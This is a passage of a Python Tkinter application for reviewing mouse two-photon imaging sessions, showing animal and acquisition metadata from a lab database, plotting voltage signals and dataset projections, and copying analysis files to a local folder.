self.frame1.frame1.buttons[ butt]= ttk.Button( self.frame1.frame1 , text= self.frame1.frame1.buttons_names[i], command= self.frame1.frame1.buttons_commands[i])\n\n\n # for i, name in enumerate(self.frame1.frame1.buttons_names):\n # self.frame1.frame1.buttons[name].grid(column=0, row=i+3) \n\n\n#%%'Imaging Session Info Frame METADATA frame' \n \n self.frame1.frame2=self.frame1.frames[self.frame1.frames_names[1]]\n \n \n self.frame1.frame2.labels={}\n self.frame1.frame2.labels_names=['MouseCode', \n 'Age',\n 'Sex',\n 'Line',\n 'Genotype',\n 'Cage',\n 'Project',\n 'Ear Mark',\n 'Injection Date',\n 'Days From Injection',\n 'Window Date',\n 'Days From Window',\n 'Virus Combination',\n 'Dilution Sensor 1',\n 'Dilution Sensor 2',\n 'Dilution Opto',\n 'CoverType',\n 'Damaged Areas',\n 'InjectionSite1bleeding',\n 'InjectionSite2bleeding',\n 'Notes',\n 'Injection Notes',\n 'Window Notes',\n ]\n \n for i in range(len(self.frame1.frame2.labels_names)):\n self.frame1.frame2.labels[self.frame1.frame2.labels_names[i]]=ttk.Label(self.frame1.frame2, text=self.frame1.frame2.labels_names[i], width=25)\n \n # for i, label in enumerate(self.frame1.frame2.labels_names):\n # if i<8: \n # self.frame1.frame2.labels[label].grid(column=0, row=i) \n # 
elif i<16: \n # self.frame1.frame2.labels[label].grid(column=2, row=i-8)\n # else: \n # self.frame1.frame2.labels[label].grid(column=0, row=i-9)\n\n # self.frame1.frame2.labels_values={}\n # self.frame1.frame2.labels_values_variables={}\n\n # for i ,label in enumerate(self.frame1.frame2.labels_names):\n # self.frame1.frame2.labels_values_variables[label]=StringVar()\n # if i<18:\n # self.frame1.frame2.labels_values[label]=ttk.Label(self.frame1.frame2, textvariable= self.frame1.frame2.labels_values_variables[label], width=25)\n # else:\n # self.frame1.frame2.labels_values[label]=ttk.Label(self.frame1.frame2, textvariable= self.frame1.frame2.labels_values_variables[label], width=50)\n\n # for i, label in enumerate(self.frame1.frame2.labels_names):\n # if i<8: \n # self.frame1.frame2.labels_values[label].grid(column=1, row=i) \n\n # elif i<16: \n # self.frame1.frame2.labels_values[label].grid(column=3, row=i-8)\n # else:\n # self.frame1.frame2.labels_values[label].grid(column=1, row=i-9)\n \n for i, label in enumerate(self.frame1.frame2.labels_names):\n self.frame1.frame2.labels[label].grid(column=0, row=i) \n \n self.frame1.frame2.labels_values={}\n self.frame1.frame2.labels_values_variables={}\n \n for i ,label in enumerate(self.frame1.frame2.labels_names):\n self.frame1.frame2.labels_values_variables[label]=StringVar()\n self.frame1.frame2.labels_values[label]=ttk.Label(self.frame1.frame2, textvariable= self.frame1.frame2.labels_values_variables[label], width=80)\n \n for i, label in enumerate(self.frame1.frame2.labels_names):\n self.frame1.frame2.labels_values[label].grid(column=1, row=i) \n\n#%%'Imaging Session Info Frame WIDEFIELD frame' \n self.frame1.frame3=self.frame1.frames[self.frame1.frames_names[2]]\n \n self.frame1.frame3.fig = Figure(figsize=(4, 4), dpi=100)\n self.frame1.frame3.ax=self.frame1.frame3.fig.add_axes([0.1,0.1,0.8,0.8])\n self.frame1.frame3.canvas = FigureCanvasTkAgg(self.frame1.frame3.fig, master=self.frame1.frame3) # A tk.DrawingArea.\n self.frame1.frame3.canvas.draw()\n self.frame1.frame3.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1) \n self.frame1.frame3.toolbar = NavigationToolbar2Tk(self.frame1.frame3.canvas, self.frame1.frame3)\n self.frame1.frame3.toolbar.update()\n self.frame1.frame3.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n \n\n#%%'AcquisitionFrame' \n self.frame2=self.frames[self.frames_names[1]]\n \n self.frame2.frames_names=['Facecam_Frame',\n 'Voltage_Frame', \n 'Metadata_Frame',\n 'Planes_Frame',\n ]\n \n self.frame2.frames={}\n for i in range(len(self.frame2.frames_names)):\n self.frame2.frames[self.frame2.frames_names[i]]=ScrollbarFrame(self.frame2, borderwidth = 4, relief='groove')\n \n self.frame2.grid_columnconfigure(0, weight=1)\n self.frame2.grid_columnconfigure(1, weight=5)\n self.frame2.grid_rowconfigure(0, weight=4)\n self.frame2.grid_rowconfigure(1, weight=1)\n self.frame2.grid_rowconfigure(2, weight=10)\n \n\n self.frame2.frames[self.frame2.frames_names[0]].grid(row=0, column=0, sticky=\"nswe\") \n self.frame2.frames[self.frame2.frames_names[1]].grid(row=1, column=0, sticky=\"nswe\") \n self.frame2.frames[self.frame2.frames_names[2]].grid(row=2, column=0, sticky=\"nswe\") \n self.frame2.frames[self.frame2.frames_names[3]].grid(row=0, column=1, sticky=\"nswe\", rowspan=3) \n\n\n \n#%%'AcquisitionFrame FACECAM frame' \n self.frame2.frame1=self.frame2.frames[self.frame2.frames_names[0]].scrolled_frame\n\n self.frame2.frame1.buttons={}\n self.frame2.frame1.buttons_names=['Open facecamera on 
python',\n 'Open kalman on python', \n 'Open acquisition directory',\n 'Open dataset directory',\n 'transfer kalman to desktop',\n 'transfer eye video to desktop',\n 'transfer caiman to desktop',\n 'reset contrast',\n 'increase contrast 1',\n 'increase contrast 2',\n 'open raw directory',\n 'open slow mouse dir',\n 'plot signals',\n # 'Switch tomato(if 3plane ac)', \n ]\n \n \n \n self.frame2.frame1.buttons_commands=[self.open_facecamera_button, \n self.open_kalman_button,\n self.open_directory_button, \n self.open_dataset_button,\n self.transfer_kalman_to_desktop_button,\n self.transfer_facecam_to_desktop_button,\n self.transfer_caiman_to_desktop_button,\n self.de_enhance,\n self.enhance_level_1,\n self.enhance_level_2,\n self.open_raw_acquisition_directory_button,\n self.open_slow_mouse_directory_button,\n self.plot_signals_button,\n # self.switch_red_button,\n\n ] \n \n \n for i, butt in enumerate( self.frame2.frame1.buttons_names):\n self.frame2.frame1.buttons[ butt]= ttk.Button( self.frame2.frame1 , text= self.frame2.frame1.buttons_names[i], command= self.frame2.frame1.buttons_commands[i])\n\n for i, name in enumerate(self.frame2.frame1.buttons_names):\n if (i % 2) == 0: \n self.frame2.frame1.buttons[name].grid(row=int(i/2)+1, column=0, sticky=\"nswe\") \n else: \n self.frame2.frame1.buttons[name].grid(row=int((i-1)/2)+1, column=1, sticky=\"nswe\")\n\n\n self.frame2.frame1.litbox_names=['Dataset to copy selection', \n ]\n \n self.frame2.frame1.listboxes={}\n self.frame2.frame1.listbox_variables={}\n for litbox_name in self.frame2.frame1.litbox_names:\n self.frame2.frame1.listbox_variables[litbox_name]=StringVar() \n self.frame2.frame1.listboxes[litbox_name]=Listbox(self.frame2.frame1, listvariable=self.frame2.frame1.listbox_variables[litbox_name], width=10, height=10)\n \n\n self.frame2.frame1.listboxes[self.frame2.frame1.litbox_names[0]].bind('<<ListboxSelect>>', self.select_dataset_to_copy)\n\n\n for i, litbox in enumerate(self.frame2.frame1.listboxes.values()):\n litbox.grid(column=i, row=0)\n\n \n\n\n\n#%%'AcquisitionFrame VOLTAGE frame' \n self.frame2.frame2=self.frame2.frames[self.frame2.frames_names[1]].scrolled_frame\n\n # self.frame2.frame2.test_label=ttk.Label( self.frame2.frame2, text='Test voltage', width=20)\n # self.frame2.frame2.test_label.grid(row=10, column=10, sticky=\"snew\")\n\n self.frame2.frame2.fig = Figure(figsize=(7, 10), dpi=100)\n \n \n\n self.frame2.frame2.canvas = FigureCanvasTkAgg(self.frame2.frame2.fig, master= self.frame2.frame2) # A tk.DrawingArea.\n self.frame2.frame2.canvas.draw()\n self.frame2.frame2.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1) \n self.frame2.frame2.toolbar = NavigationToolbar2Tk( self.frame2.frame2.canvas, self.frame2.frame2)\n self.frame2.frame2.toolbar.update()\n self.frame2.frame2.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n \n self.frame2.frame2.axs=[]\n for i in range(7):\n self.frame2.frame2.axs.append(self.frame2.frame2.fig.add_subplot(7, 1, i+1))\n\n\n#%%'AcquisitionFrame METADATA frame' \n\n self.frame2.frame3=self.frame2.frames[self.frame2.frames_names[2]].scrolled_frame\n # self.frame2.frame3.frames_names=['Metadata Frame',\n # # 'Ref Images Frame', \n # ] \n # self.frame2.frame3.frames={}\n # for i in range(len(self.frame2.frame3.frames_names)):\n # self.frame2.frame3.frames[self.frame2.frame3.frames_names[i]]=ScrollbarFrame(self.frame2.frame3)\n\n # self.frame2.frame3.grid_columnconfigure(0, weight=1)\n # self.frame2.frame3.grid_rowconfigure(0, weight=1)\n # 
self.frame2.frame3.grid_rowconfigure(1, weight=1)\n \n # self.frame2.frame3.frames[self.frame2.frame3.frames_names[1]].grid(row=1, column=0, sticky=\"nswe\") \n \n\n self.frame2.frame3.labels={}\n self.frame2.frame3.labels_names={\n 'PowerSetting',\n 'Objective',\n 'PMT1GainRed',\n 'PMT2GainGreen',\n 'FrameAveraging',\n 'ObjectivePositions',\n 'ETLPositions',\n 'PlaneNumber',\n 'TotalVolumes',\n 'IsETLStack',\n 'IsObjectiveStack',\n 'InterFramePeriod',\n 'FinalVolumePeriod',\n 'FinalFrequency',\n 'TotalFrames',\n 'FOVNumber',\n 'ExcitationWavelength',\n 'CoherentPower',\n 'CalculatedPower',\n 'Comments',\n 'IsChannel1Red',\n 'IsChannel2Green',\n 'IsGalvo',\n 'IsResonant', \n 'Resolution',\n 'DwellTime',\n 'Multisampling',\n 'BitDepth',\n 'LinePeriod',\n 'FramePeriod',\n 'FullAcquisitionTime', \n 'RedFilter',\n 'GreenFilter',\n 'DichroicBeamsplitter',\n 'IsBlockingDichroic',\n 'OverlapPercentage',\n 'AtlasOverlap',\n 'OverlapPercentageMetadata',\n 'AtlasDirection',\n 'AtlasZStructure',\n 'AtlasGridSize',\n 'CorrectedObjectivePositions',\n 'CorrectedETLPositions',\n 'ImagingTime',\n 'IsVoltagERecording',\n 'MicronsPerPixelX',\n 'MicronsPerPixelY',\n 'Xpositions',\n 'Ypositions',\n 'Zoom',\n 'VoltageRecordingChannels',\n 'VoltageRecordingFrequency'}\n \n self.frame2.frame3.labels_names=sorted( self.frame2.frame3.labels_names)\n\n for i in range(len(self.frame2.frame3.labels_names)):\n self.frame2.frame3.labels[self.frame2.frame3.labels_names[i]]=ttk.Label(self.frame2.frame3, text=self.frame2.frame3.labels_names[i], width=25)\n \n for i, label in enumerate(self.frame2.frame3.labels_names):\n if i<26: \n self.frame2.frame3.labels[label].grid(column=0, row=i) \n else: \n self.frame2.frame3.labels[label].grid(column=2, row=i-26)\n \n self.frame2.frame3.labels_values={}\n self.frame2.frame3.labels_values_variables={}\n \n for i ,label in enumerate(self.frame2.frame3.labels_names):\n self.frame2.frame3.labels_values_variables[label]=StringVar()\n self.frame2.frame3.labels_values[label]=ttk.Label(self.frame2.frame3, textvariable= self.frame2.frame3.labels_values_variables[label], width=25)\n\n \n for i, label in enumerate(self.frame2.frame3.labels_names):\n if i<26: \n self.frame2.frame3.labels_values[label].grid(column=1, row=i) \n \n else: \n self.frame2.frame3.labels_values[label].grid(column=3, row=i-26)\n \n \n \n#%%'AcquisitionFrame datasets frame' \n \n self.frame2.frame4=self.frame2.frames[self.frame2.frames_names[3]].scrolled_frame\n \n self.frame2.frame4.frames_names=['Dataset1 Frame' ,\n 'Dataset2 Frame', \n 'Dataset3 Frame',\n 'Dataset4 Frame'\n ]\n \n self.frame2.frame4.frames={}\n for i, val in enumerate(self.frame2.frame4.frames_names):\n self.frame2.frame4.frames[val]=ttk.Frame(self.frame2.frame4, borderwidth = 4, relief='groove')\n \n self.frame2.frame4.grid_columnconfigure(0, weight=1)\n self.frame2.frame4.grid_columnconfigure(1, weight=1)\n self.frame2.frame4.grid_rowconfigure(0, weight=1)\n self.frame2.frame4.grid_rowconfigure(1, weight=1)\n \n for i, val in enumerate(self.frame2.frame4.frames_names):\n if (i % 2) == 0: \n self.frame2.frame4.frames[val].grid(row=int(i/2), column=0, sticky=\"nswe\") \n else: \n self.frame2.frame4.frames[val].grid(row=int((i-1)/2), column=1, sticky=\"nswe\") \n #%%'AcquisitionFrame dataset frame images' \n for dataset_frame in self.frame2.frame4.frames.values():\n dataset_frame.frames_names=['Std proj', \n 'average proj' \n ]\n dataset_frame.frames={}\n for i, val in enumerate(dataset_frame.frames_names):\n 
dataset_frame.frames[val]=ttk.Frame(dataset_frame, borderwidth = 4, relief='groove')\n \n dataset_frame.grid_columnconfigure(0, weight=1)\n dataset_frame.grid_columnconfigure(1, weight=1)\n dataset_frame.grid_rowconfigure(0, weight=1)\n \n \n for i, val in enumerate(dataset_frame.frames_names):\n dataset_frame.frames[val].grid(row=0, column=i, sticky=\"nswe\") \n \n for frame in dataset_frame.frames.values():\n frame.fig = Figure(figsize=(4, 4), dpi=100)\n frame.ax= frame.fig.add_axes([0.1,0.1,0.8,0.8])\n frame.canvas = FigureCanvasTkAgg( frame.fig, master= frame) # A tk.DrawingArea.\n frame.canvas.draw()\n frame.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1) \n frame.toolbar = NavigationToolbar2Tk( frame.canvas, frame)\n frame.toolbar.update()\n frame.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n#%% methods \n def get_all_objects(self):\n # this is the slowest step, loads all metadata\n\n self.mice_objects={mouse:{'Object':self.datamanaging.all_experimetal_mice_objects[mouse]} for mouse in self.mice}\n for mouse, m_dic in self.mice_objects.items():\n m_dic['Acquisitions']={acq: {'Object':acq_ob} for acq, acq_ob in m_dic['Object'].all_mouse_acquisitions.items()}\n \n if m_dic['Acquisitions'].items():\n for acq, ac_dic in m_dic['Acquisitions'].items():\n print('loading metadata '+ acq)\n ac_dic['Object'].load_metadata_slow_working_directories()\n if not ac_dic['Object'].voltage_signal_object.no_voltage_signals:\n print('loading signals '+ acq)\n ac_dic['Object'].voltage_signal_object.load_slow_storage_voltage_signals()\n ac_dic['Object'].voltage_signal_object.signal_extraction_object()\n\n ac_dic['Datasets']={dtset:{'Object':dtset_ob} for dtset, dtset_ob in ac_dic['Object'].all_datasets.items()}\n\n\n \n def get_mouse_imaged(self): \n \n self.mice=self.datamanaging.all_existing_sessions_not_database_objects[self.session_date].session_imaged_mice_codes\n self.frame1.frame1.listbox_variables[self.frame1.frame1.litbox_names[0]].set(self.mice)\n\n def get_all_mouse_acquisitions(self):\n \n acquisitions=list(self.mice_objects[self.mouse_code]['Acquisitions'].keys())\n self.frame1.frame1.listbox_variables[self.frame1.frame1.litbox_names[1]].set(acquisitions) \n self.frame1.frame1.listboxes[self.frame1.frame1.litbox_names[1]].config(width=0,height=0)\n \n def get_acquisition_datasets(self): \n selected_acq_datasets= list(self.mice_objects[self.mouse_code]['Acquisitions'][self.selected_acquisition]['Datasets'].keys())\n # for listbox_var in self.frame1.frame1.listbox_variables[self.frame1.frame1.litbox_names[2:]]:\n for var_name in self.frame1.frame1.litbox_names[2:]:\n listbox_var =self.frame1.frame1.listbox_variables[var_name]\n listbox_var.set(selected_acq_datasets) \n self.frame1.frame1.listboxes[var_name].config(width=0,height=0)\n\n self.frame2.frame1.listbox_variables[list(self.frame2.frame1.listbox_variables.keys())[0]].set(selected_acq_datasets) \n self.frame2.frame1.listboxes[list(self.frame2.frame1.listboxes.keys())[0]].config(width=0,height=0)\n\n def get_dataset_objects(self):\n # self.selected_dataset_object=self.selected_acquisition_object.all_datasets[self.selected_dataset]\n self.selected_dataset_objects={}\n for key, val in self.selected_datasets.items():\n self.selected_dataset_objects[key]=self.mice_objects[self.mouse_code]['Acquisitions'][self.selected_acquisition]['Datasets'][val]['Object']\n \n def load_selected_datasets(self):\n \n self.selected_acquisition_object.load_vis_stim_info()\n 
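# stim info and voltage traces are stored per acquisition; the per-dataset projections are loaded below\n 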
self.selected_acquisition_object.load_voltage_signals()\n \n for key, val in self.selected_dataset_objects.items():\n val.summary_images_object.load_projections()\n \n def unload_all_datasets(self):\n for key, val in self.selected_dataset_objects.items():\n val.unload_dataset()\n \n def get_mouse_object(self):\n \n self.selected_mouse_object= self.mice_objects[self.mouse_code]['Object']\n \n def get_acquisition_object(self):\n self.selected_acquisition_object=self.mice_objects[self.mouse_code]['Acquisitions'][self.selected_acquisition]['Object']\n \n def get_mouse_info_and_data(self, event):\n selection = self.frame1.frame1.listboxes[self.frame1.frame1.litbox_names[0]].curselection()\n if selection:\n index = selection[0]\n self.mouse_code = event.widget.get(index)\n self.get_mouse_object()\n self.get_all_mouse_acquisitions()\n self.get_all_mouse_database_info()\n self.plot_widefield()\n \n else:\n pass\n \n def get_acquisition_info(self, event):\n selection = self.frame1.frame1.listboxes[self.frame1.frame1.litbox_names[1]].curselection()\n if selection:\n index = selection[0]\n self.selected_acquisition = event.widget.get(index)\n self.get_acquisition_object()\n self.get_acquisition_datasets() \n \n \n self.get_acq_metadata()\n \n # self.get_ac_facecam()\n # self.get_ac_voltages()\n # self.plot_signals()\n\n else:\n pass \n\n def get_acq_metadata(self):\n # self.selected_acquisition_object.load_metadata_slow_working_directories()\n self.metadata_dict=self.selected_acquisition_object.metadata_object.translated_imaging_metadata\n\n\n for i, label in enumerate(self.frame2.frame3.labels_names): \n \n if self.metadata_dict[label] is not np.nan: \n self.frame2.frame3.labels_values_variables[label].set( self.metadata_dict[label])\n else:\n self.frame2.frame3.labels_values_variables[label].set('NA')\n\n def get_dataset_info(self, event):\n self.selected_datasets={}\n \n for i, var_name in enumerate(self.frame1.frame1.litbox_names[2:]):\n \n listbox=self.frame1.frame1.listboxes[var_name]\n \n selection = listbox.curselection()\n if selection:\n index = selection[0]\n self.selected_datasets[self.frame1.frame1.litbox_names[i+2]] = event.widget.get(index)\n print(self.selected_datasets)\n else:\n pass\n self.get_dataset_objects()\n self.load_selected_datasets()\n self.plot_dataset_projections()\n \n def get_all_mouse_database_info(self):\n\n query_all_animals_recovery=\"\"\"\n SELECT \n Code, \n round(round(julianday('now') - julianday(b.DOB))) AS Age,\n aa.Sex_types,\n Line_short,\n G2C_table.Genotypes_types AS G2C,\n Cage,\n d.Projects,\n Labels_types,\n e.InjDate,\n round(round(julianday('now') - julianday(Injection1Date))) AS DaysFromInjection,\n f.WindDate,\n round(round(julianday('now') - julianday(WindowDate))) AS DaysFromWindow,\n Combination,\n e.DilutionSensor1,\n e.DilutionSensor2,\n e.DilutionOpto,\n ab.WindowType,\n f.DamagedAreas,\n e.InjectionSite1bleeding,\n e.InjectionSite2bleeding, \n a.Notes,\n e.Notes AS InjectionNotes, \n f.Notes AS WindowNotes, \n k.Sensors AS Sensors1,\n l.Optos AS Optos1, \n o.Sensors AS Sensors2, \n r.Optos AS Optos3, \n G2C_table.Genotypes_types AS G2C,\n Ai14_table.Genotypes_types AS Ai14,\n Ai75_table.Genotypes_types AS Ai75,\n VRC_table.Genotypes_types AS VRC,\n SLF_table.Genotypes_types AS SLF,\n PVF_table.Genotypes_types AS PVF,\n Ai65_table.Genotypes_types AS Ai65,\n Ai80_table.Genotypes_types AS Ai80,\n VGC_table.Genotypes_types AS VGC,\n Ai162_table.Genotypes_types AS Ai162,\n Ai148_table.Genotypes_types AS Ai148 \n FROM ExperimentalAnimals_table a\n 
LEFT JOIN MICE_table b ON a.Mouse_ID = b.ID \n LEFT JOIN Lines_table c ON c.ID=b.Line\n LEFT JOIN Projects_table d ON d.ID=a.Project\n LEFT JOIN Injections_table e ON e.ExpID = a.ID\n LEFT JOIN Windows_table f ON f.ExpID = a.ID\n LEFT JOIN VirusCombinations_table g ON g.ID=e.VirusCombination\n LEFT JOIN Virus_table h ON h.ID=g.Virus1\n LEFT JOIN Virus_table i ON i.ID=g.Virus2\n LEFT JOIN Virus_table j ON j.ID=g.Virus3\n LEFT JOIN Sensors_table k ON k.ID=h.Sensor\n LEFT JOIN Optos_table l ON l.ID=h.Opto\n LEFT JOIN Promoter_table m ON m.ID=h.Promoter\n LEFT JOIN Recombinase_table n ON n.ID=h.Recombinase\n LEFT JOIN Sensors_table o ON o.ID=i.Sensor\n LEFT JOIN Promoter_table p ON p.ID=i.Promoter\n LEFT JOIN Recombinase_table q ON q.ID=i.Recombinase\n LEFT JOIN Optos_table r ON r.ID=j.Opto\n LEFT JOIN Promoter_table s ON s.ID=j.Promoter\n LEFT JOIN Recombinase_table t ON t.ID=j.Recombinase\n LEFT JOIN Genotypes_table AS G2C_table ON b.G2C = G2C_table.ID\n LEFT JOIN Genotypes_table AS Ai14_table ON b.Ai14 = Ai14_table.ID\n LEFT JOIN Genotypes_table AS Ai75_table ON b.Ai75 = Ai75_table.ID\n LEFT JOIN Genotypes_table AS VRC_table ON b.VRC = VRC_table.ID\n LEFT JOIN Genotypes_table AS SLF_table ON b.SLF = SLF_table.ID\n LEFT JOIN Genotypes_table AS PVF_table ON b.PVF = PVF_table.ID\n LEFT JOIN Genotypes_table AS Ai65_table ON b.Ai65 = Ai65_table.ID\n LEFT JOIN Genotypes_table AS Ai80_table ON b.Ai80 = Ai80_table.ID\n LEFT JOIN Genotypes_table AS VGC_table ON b.VGC = VGC_table.ID\n LEFT JOIN Genotypes_table AS Ai162_table ON b.Ai162 = Ai162_table.ID\n LEFT JOIN Genotypes_table AS Ai148_table ON b.Ai148 = Ai148_table.ID\n LEFT JOIN Labels_table z on z.ID=a.EarMark \n LEFT JOIN Sex_table aa on aa.ID=b.Sex\n LEFT JOIN Covertype_table ab on ab.ID=f.CoverType\n\n WHERE Code IN(?)\"\"\" \n \n params=tuple([self.mouse_code,])\n self.micebrought_info=self.datamanaging.Database_ref.arbitrary_query_to_df(query_all_animals_recovery, params)\n \n for i, label in enumerate(self.frame1.frame2.labels_names): \n if self.micebrought_info.iloc[0, i]:\n self.frame1.frame2.labels_values_variables[label].set(self.micebrought_info.iloc[0, i]) \n else:\n self.frame1.frame2.labels_values_variables[label].set('NA') \n \n def open_directory_button(self):\n self.open_acquisition_directory_action()\n \n def open_raw_acquisition_directory_button(self):\n self.open_raw_acquisition_directory_action()\n \n def open_slow_mouse_directory_button(self):\n self.open_slow_mouse_directory_action()\n \n def open_dataset_button(self):\n self.open_dataset_directory_action()\n \n def transfer_kalman_to_desktop(self): \n try:\n if os.path.isfile(self.selected_dataset_to_copy_object.kalman_object.kalman_path):\n print('transferring kalman to desktop')\n shutil.copyfile(self.selected_dataset_to_copy_object.kalman_object.kalman_path, os.path.join(r'C:\\Users\\sp3660\\Desktop\\DatabaseAddingTemporal',os.path.split(self.selected_dataset_to_copy_object.kalman_object.kalman_path)[1]))\n print('kalman transferred')\n\n else:\n print('no kalman')\n\n except:\n print('kalman not transferred')\n \n def transfer_kalman_to_desktop_button(self):\n self.transfer_kalman_to_desktop()\n\n def transfer_caiman_to_desktop(self):\n try:\n if os.path.isfile(self.selected_dataset_to_copy_object.most_updated_caiman.caiman_path):\n\n print('transferring caiman to desktop')\n shutil.copyfile(self.selected_dataset_to_copy_object.most_updated_caiman.caiman_path, 
os.path.join(r'C:\\Users\\sp3660\\Desktop\\DatabaseAddingTemporal',os.path.split(self.selected_dataset_to_copy_object.most_updated_caiman.caiman_path)[1]))\n print('caiman transferred')\n else:\n print('no caiman')\n\n except:\n print('caiman not transferred')\n \n def transfer_caiman_to_desktop_button(self):\n self.transfer_caiman_to_desktop()\n\n def transfer_facecam_to_desktop(self):\n \n try:\n if os.path.isfile(self.selected_acquisition_object.face_camera.working_camera_full_path):\n print('transferring facecam to desktop')\n shutil.copyfile(self.selected_acquisition_object.face_camera.working_camera_full_path, os.path.join(r'C:\\Users\\sp3660\\Desktop\\DatabaseAddingTemporal',os.path.split(self.selected_acquisition_object.face_camera.working_camera_full_path)[1]))\n print('facecam transferred')\n else:\n print('no facecam')\n\n except:\n print('facecam not transferred')\n\n def transfer_facecam_to_desktop_button(self):\n self.transfer_facecam_to_desktop()\n\n def select_dataset_to_copy(self, event):\n\n selection = self.frame2.frame1.listboxes[self.frame2.frame1.litbox_names[0]].curselection()\n if selection:\n index = selection[0]\n self.selected_dataset_to_copy = event.widget.get(index)\n self.selected_dataset_to_copy_object=self.selected_acquisition_object.all_datasets[self.selected_dataset_to_copy]\n \n else:\n pass \n \n def open_acquisition_directory_action(self):\n \n os.startfile(self.selected_acquisition_object.mouse_aquisition_path)\n \n def open_slow_mouse_directory_action(self):\n \n os.startfile( os.path.join(self.selected_mouse_object.mouse_slow_subproject_path,'imaging',self.session_date))\n \n def open_raw_acquisition_directory_action(self):\n \n os.startfile(self.datamanaging.all_existing_sessions_not_database_objects[ self.session_date].imaging_session_mice_path+'\\\\'+self.mouse_code)\n\n def open_dataset_directory_action(self):\n \n os.startfile(self.selected_dataset_to_copy_object.selected_dataset_mmap_path)\n\n def open_facecamera_button(self):\n pass\n \n def open_kalman_button(self):\n pass\n\n def switch_red_button(self):\n pass\n \n def plot_widefield(self, *a):\n \n widefieldob=self.datamanaging.all_experimetal_mice_objects[ self.mouse_code].\\\n imaging_sessions_not_yet_database_objects[self.session_date].\\\n widefield_image[list(self.datamanaging.all_experimetal_mice_objects[ self.mouse_code].\\\n imaging_sessions_not_yet_database_objects[self.session_date].\\\n widefield_image.keys())[0]]\n \n widefieldob.load_all()\n self.frame1.frame3.ax.clear()\n widefieldob.plot_image(self.frame1.frame3.ax)\n widefieldob.plot_rois(self.frame1.frame3.ax)\n \n self.frame1.frame3.canvas.draw() \n \n def plot_signals_button(self):\n t=time.time()\n print('Plotting signals')\n self.plot_signals()\n elapsed=time.time()-t\n\n print('Signals plotted '+ str(elapsed) )\n pass\n \n def plot_signals(self):\n \n for i in self.frame2.frame2.axs:\n i.clear()\n \n self.frame2.frame2.canvas.draw() \n dats=[]\n if not self.selected_acquisition_object.voltage_signal_object.no_voltage_signals:\n if hasattr(self.selected_acquisition_object.voltage_signal_object.extraction_object, 'rectified_speed_array'): \n dats.append(self.selected_acquisition_object.voltage_signal_object.extraction_object.rectified_speed_array)\n else:\n dats.append(np.array([False]) )\n \n for signal in self.selected_acquisition_object.voltage_signal_object.voltage_signals_dictionary.keys():\n dats.append(self.selected_acquisition_object.voltage_signal_object.voltage_signals_dictionary[signal])\n\n # for n, ax in 
enumerate(self.frame2.frame2.axs):\n for n, dat in enumerate(dats):\n self.frame2.frame2.axs[n].clear()\n self.frame2.frame2.canvas.draw() \n self.frame2.frame2.axs[n].plot(dat)\n else:\n dats.append(np.array([False]))\n self.frame2.frame2.axs[0].clear()\n self.frame2.frame2.axs[0].plot(dats[0])\n \n self.frame2.frame2.canvas.draw() \n \n def plot_dataset_projections(self, *a):\n \n for i, dataset in enumerate(self.selected_dataset_objects.values()):\n \n for j, image_frame in enumerate(self.frame2.frame4.frames[self.frame2.frame4.frames_names[i]].frames.values()):\n \n dataset_final=np.array([False])\n image_frame.ax.clear()\n image_frame.canvas.draw() \n\n if j==0:\n dataset_final=dataset.summary_images_object.projection_dic['std_projection_path']\n else:\n dataset_final=dataset.summary_images_object.projection_dic['average_projection_path']\n\n if dataset_final.any():\n image_frame.ax.clear() \n image_frame.ax.imshow(dataset_final, cmap='inferno', aspect='equal')\n image_frame.canvas.draw() \n \n def enhance_level_1(self,*a): \n self.get_dataset_objects()\n for i, dataset in enumerate(self.selected_dataset_objects.values()):\n \n for j, image_frame in enumerate(self.frame2.frame4.frames[self.frame2.frame4.frames_names[i]].frames.values()):\n dataset_final=np.array([False])\n image_frame.ax.clear()\n image_frame.canvas.draw() \n\n if j==0:\n dataset_final=dataset.summary_images_object.projection_dic['std_projection_path']\n else:\n dataset_final=dataset.summary_images_object.projection_dic['average_projection_path']\n\n if dataset_final.any():\n image_frame.ax.clear()\n dataset_final.min() \n average=dataset_final.mean()\n std_im=dataset_final.std()\n vmin=average-8*std_im\n vmax=average+8*std_im\n if vmin< dataset_final.min() : vmin = dataset_final.min()\n if vmax> dataset_final.max() : vmax = dataset_final.max()\n image_frame.ax.imshow(dataset_final, cmap='inferno', aspect='equal', vmin=vmin, vmax=vmax) \n image_frame.canvas.draw()\n \n def enhance_level_2(self,*a): \n self.get_dataset_objects()\n for i, dataset in enumerate(self.selected_dataset_objects.values()):\n \n for j, image_frame in enumerate(self.frame2.frame4.frames[self.frame2.frame4.frames_names[i]].frames.values()):\n dataset_final=np.array([False])\n image_frame.ax.clear()\n image_frame.canvas.draw() \n \n if j==0:\n dataset_final=dataset.summary_images_object.projection_dic['std_projection_path']\n else:\n dataset_final=dataset.summary_images_object.projection_dic['average_projection_path']\n \n if dataset_final.any():\n image_frame.ax.clear()\n dataset_final.min() \n average=dataset_final.mean()\n std_im=dataset_final.std()\n vmin=average-6*std_im\n vmax=average+6*std_im\n if vmin< dataset_final.min() : vmin = dataset_final.min()\n if vmax> dataset_final.max() : vmax = dataset_final.max()\n image_frame.ax.imshow(dataset_final, cmap='inferno', aspect='equal', vmin=vmin, vmax=vmax) \n image_frame.canvas.draw()\n \n def de_enhance(self,*a): \n self.get_dataset_objects()\n for i, dataset in enumerate(self.selected_dataset_objects.values()):\n \n for j, image_frame in enumerate(self.frame2.frame4.frames[self.frame2.frame4.frames_names[i]].frames.values()):\n\n dataset_final=np.array([False])\n image_frame.ax.clear()\n image_frame.canvas.draw() \n\n if j==0:\n dataset_final=dataset.summary_images_object.projection_dic['std_projection_path']\n else:\n dataset_final=dataset.summary_images_object.projection_dic['average_projection_path']\n\n if dataset_final.any():\n image_frame.ax.clear()\n image_frame.ax.imshow(dataset_final, 
